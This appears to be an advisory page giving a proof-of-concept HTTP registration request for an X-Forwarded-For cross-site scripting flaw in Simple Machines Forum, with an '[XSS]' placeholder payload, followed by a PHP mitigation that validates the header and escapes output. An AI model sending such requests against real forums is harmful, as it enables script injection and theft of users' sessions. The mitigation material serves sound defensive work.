PoC/Exploit for X-Forwarded-For XSS in Simple Machines Forum - SMF

Published Proof of Concept code - X-Forwarded-For XSS in Simple Machines Forum - SMF.

Description: Available
Solution: Not available - check vendor's website

Example of HTTP POST Query:

    POST /smf/index.php?PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944&action=register2 HTTP/1.0
    Host: [host]
    X-Forwarded-For: anyIP[XSS]
    Cookie: PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944
    Content-Length: 81

    user=m&email=m@m.com&passwrd1=m&passwrd2=m&regagree=1&regSubmit=Register
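
A mitigation example for the header shown in the request above, added here and not SMF's own code. It assumes the application records the X-Forwarded-For value and later prints it in an HTML page, which the advisory does not detail; the function names client_ip_for_logging and render_ip are hypothetical.

```php
<?php
// Added example, not SMF code. Function names are hypothetical.

/**
 * Return the client address to record for a request.
 * X-Forwarded-For is client-controlled, so it is used only when every
 * entry parses as an IPv4/IPv6 literal; otherwise REMOTE_ADDR is used.
 * A well-formed value can still be spoofed: treat it as display data
 * unless the request arrived through a proxy you operate.
 */
function client_ip_for_logging(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    $fallback = filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';

    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '' || strlen($xff) > 256) {
        return $fallback;
    }

    // The header may carry a comma-separated chain: client, proxy1, proxy2.
    $entries = array_map('trim', explode(',', $xff));
    foreach ($entries as $entry) {
        if (filter_var($entry, FILTER_VALIDATE_IP) === false) {
            return $fallback; // any malformed entry: distrust the whole header
        }
    }
    return $entries[0];
}

/** Escape at output too, in case older rows hold unvalidated values. */
function render_ip(string $stored): string
{
    return htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample requests (not taken from the advisory).
$samples = [
    ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => '198.51.100.4, 203.0.113.7'],
    ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => '198.51.100.4<b>not-an-ip</b>'],
    ['REMOTE_ADDR' => '203.0.113.7'],
];
foreach ($samples as $s) {
    echo render_ip(client_ip_for_logging($s)), PHP_EOL;
}
```

Validation on input and escaping on output are both kept: the first stops new malformed values from being stored, the second covers values stored before the check existed.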
